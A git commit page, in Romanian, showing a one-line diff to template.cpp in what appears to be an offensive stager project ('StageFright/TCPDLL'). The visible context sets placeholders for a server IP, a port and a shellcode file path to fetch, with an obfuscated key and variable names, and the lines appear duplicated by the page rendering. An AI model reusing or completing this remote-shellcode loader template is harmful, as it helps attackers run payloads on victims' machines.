Răsfoiți Sursa

Update template.cpp

assume-breach 2 ani în urmă
părinte
comite
1850fde30b
1 a modificat fișierele cu 1 adăugiri și 1 ștergeri
  1. 1 1
      StageFright/StageFright/StageFright/TCPDLL/template.cpp

+ 1 - 1
StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -128,7 +128,7 @@ int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Rando
 
 
 char Random9[] = KEYVALUE;
 char Random9[] = KEYVALUE;
 
 
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
     const char* Random2 = "HOSTIP";        // Replace with the actual server IP
     const char* Random2 = "HOSTIP";        // Replace with the actual server IP
     int Random3 = PORTY;                     // Replace with the actual server port
     int Random3 = PORTY;                     // Replace with the actual server port
     const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
     const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server